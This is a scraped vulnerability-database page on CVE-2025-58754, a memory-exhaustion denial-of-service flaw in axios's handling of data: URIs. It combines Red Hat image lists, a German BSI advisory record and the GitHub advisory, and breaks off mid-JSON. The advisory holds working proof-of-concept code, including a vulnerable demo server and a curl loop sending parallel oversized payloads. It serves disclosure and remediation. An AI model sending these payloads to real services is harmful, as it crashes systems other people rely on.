"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
}
]
}
wid-sec-w-2025-2134
Vulnerability from csaf_certbund
Notes
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat Enterprise Linux (Developer Hub) (RHEL) ist eine popul\u00e4re Linux-Distribution.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Red Hat Enterprise Linux (Developer Hub) ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-2134 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-2134.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-2134 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2134"
},
{
"category": "external",
"summary": "Red Hat Security Advisory vom 2025-09-25",
"url": "https://access.redhat.com/errata/RHSA-2025:16747"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7248128 vom 2025-10-16",
"url": "https://www.ibm.com/support/pages/node/7248128"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:19221 vom 2025-10-29",
"url": "https://access.redhat.com/errata/RHSA-2025:19221"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:19335 vom 2025-10-30",
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7249661 vom 2025-10-30",
"url": "https://www.ibm.com/support/pages/node/7249661"
}
],
"source_lang": "en-US",
"title": "Red Hat Enterprise Linux (Developer Hub): Schwachstelle erm\u00f6glicht Denial of Service",
"tracking": {
"current_release_date": "2025-10-30T23:00:00.000+00:00",
"generator": {
"date": "2025-10-31T09:28:55.128+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2025-2134",
"initial_release_date": "2025-09-25T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-09-25T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-10-16T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-10-28T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-10-30T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat und IBM aufgenommen"
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM QRadar SIEM",
"product": {
"name": "IBM QRadar SIEM",
"product_id": "T021415",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:-"
}
}
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform",
"product": {
"name": "Red Hat Ansible Automation Platform",
"product_id": "T030096",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:-"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version_range",
"name": "Developer Hub \u003c1.6.5",
"product": {
"name": "Red Hat Enterprise Linux Developer Hub \u003c1.6.5",
"product_id": "T047182"
}
},
{
"category": "product_version",
"name": "Developer Hub 1.6.5",
"product": {
"name": "Red Hat Enterprise Linux Developer Hub 1.6.5",
"product_id": "T047182-fixed",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:developer_hub__1.6.5"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58754",
"product_status": {
"known_affected": [
"67646",
"T021415",
"T047182",
"T030096"
]
},
"release_date": "2025-09-25T22:00:00.000+00:00",
"title": "CVE-2025-58754"
}
]
}
ghsa-4hjh-wcwx-xvwj
Vulnerability from github
Summary
When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.
Details
The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
```js const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls); const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined); const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') { let convertedData; if (method !== 'GET') { return settle(resolve, reject, { status: 405, ... }); } convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob }); return settle(resolve, reject, { data: convertedData, status: 200, ... }); } ```
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
js
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
- The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
- It does not honour
config.maxContentLengthorconfig.maxBodyLength, which only apply to HTTP streams. - As a result, a
data:URI of arbitrary size can cause the Node process to allocate the entire content into memory.
In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.
PoC
```js const axios = require('axios');
async function main() { // this example decodes ~120 MB const base64Size = 160_000_000; // 120 MB after decoding const base64 = 'A'.repeat(base64Size); const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length); const response = await axios.get(uri, { responseType: 'arraybuffer' });
console.log('Received bytes:', response.data.length); }
main().catch(err => { console.error('Error:', err.message); }); ```
Run with limited heap to force a crash:
bash
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength, maxBodyLength and decodes into memory on Node before streaming enabling DoS.
```js import express from "express"; import morgan from "morgan"; import axios from "axios"; import http from "node:http"; import https from "node:https"; import { PassThrough } from "node:stream";
const keepAlive = true; const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 }); const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 }); const axiosClient = axios.create({ timeout: 10000, maxRedirects: 5, httpAgent, httpsAgent, headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" }, validateStatus: c => c >= 200 && c < 400 });
const app = express(); const PORT = Number(process.env.PORT || 8081); const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT })); app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/* * POST /preview { "url": "" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). /
app.post("/preview", async (req, res) => { const url = req.body?.url; if (!url) return res.status(400).json({ error: "missing url" });
let u; try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist const allowed = new Set(["http:", "https:", "data:"]); if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController(); const onClose = () => controller.abort(); res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try { const r = await axiosClient.get(u.toString(), { responseType: "stream", maxContentLength: 8 * 1024, // Axios will ignore this for data: maxBodyLength: 8 * 1024, // Axios will ignore this for data: signal: controller.signal });
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) { const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); res.status(502).json({ error: String(err?.message || err) }); } finally { res.off("close", onClose); } });
app.listen(PORT, () => {
console.log(axios-poc-link-preview listening on http://0.0.0.0:${PORT});
console.log(Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).);
});
Run this app and send 3 post requests:sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB10241024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
Suggestions
-
Enforce size limits For
protocol === 'data:', inspect the length of the Base64 payload before decoding. Ifconfig.maxContentLengthorconfig.maxBodyLengthis set, reject URIs whose payload exceeds the limit. -
Stream decoding Instead of decoding the entire payload in one
Buffer.fromcall, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.12.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.30.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58754"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-11T21:07:55Z",
"nvd_published_at": "2025-09-12T02:15:46Z",
"severity": "HIGH"
},
"details": "## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === \u0027data:\u0027) {\n let convertedData;\n if (method !== \u0027GET\u0027) {\n return settle(resolve, reject, { status: 405, ... });\n }\n convertedData = fromDataURI(config.url, responseType === \u0027blob\u0027, {\n Blob: config.env \u0026\u0026 config.env.Blob\n });\n return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in 